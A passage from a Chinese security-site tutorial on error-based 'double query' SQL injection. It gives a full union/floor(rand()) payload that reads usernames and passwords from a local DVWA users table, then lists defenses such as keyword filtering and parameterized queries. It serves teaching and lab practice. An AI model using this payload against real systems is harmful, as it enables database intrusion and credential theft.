当前位置:主页>产 业>技术与方法>基本技术>

数据安全之双查询注入解析(4)

shuangzhuru13

然后修改limit的值,得到字段user,password

5、然后读取字段的值

1http://127.0.0.1/yi.php?id=-1 union Select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user,0x22,password) from dvwa.users limit 0,1))a from information_schema.tables group by a)b

shuangzhuru14

这样子就得到字段的值啦,然后提醒一下,要是跨库读取数据,要写成数据库名然后.表名。因为当前数据库是test,然后我读的是dvwa库的users的表,所以要写成dvwa.users

好了基本就是这么多啦。

防范办法:

一个是过滤啦(把’,”,union,select load_file,%,and等敏感字符都过滤啦)

另一个是参数化查询,就是一种把查询语句给固定死了,无论传过来的值是什么,都只当做变量来执行查询语句

demo的源码:

(责任编辑:)

相关阅读:

分享到:

更多
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
  • 微笑/wx
  • 撇嘴/pz
  • 抓狂/zk
  • 流汗/lh
  • 大兵/db
  • 奋斗/fd
  • 疑问/yw
  • 晕/y
  • 偷笑/wx
  • 可爱/ka
  • 傲慢/am
  • 惊恐/jk
用户名: 验证码:点击我更换图片
最新评论 进入详细评论页>>
最新内容
资料下载专区
热点内容
图文资讯

如何运维网站能让其稳定高效之稳定篇

黑客、Geek等高手们都是这样上网的

如何选择最佳的数据中心闪存?

手机解锁:图案、数字谁更强?

黑客声称一款流行的加密App竟然只用了异或

返回首页 返回顶部
Copyright © 2008-2015 版权所有 国工信科技发展(北京)有限公司 Power by DedeCms
邮箱:secdoctor007@163.com
关于我们 | 联系我们 | 人才招聘 | 法律说明 | 站点地图 | 留言
京ICP备09032960号-4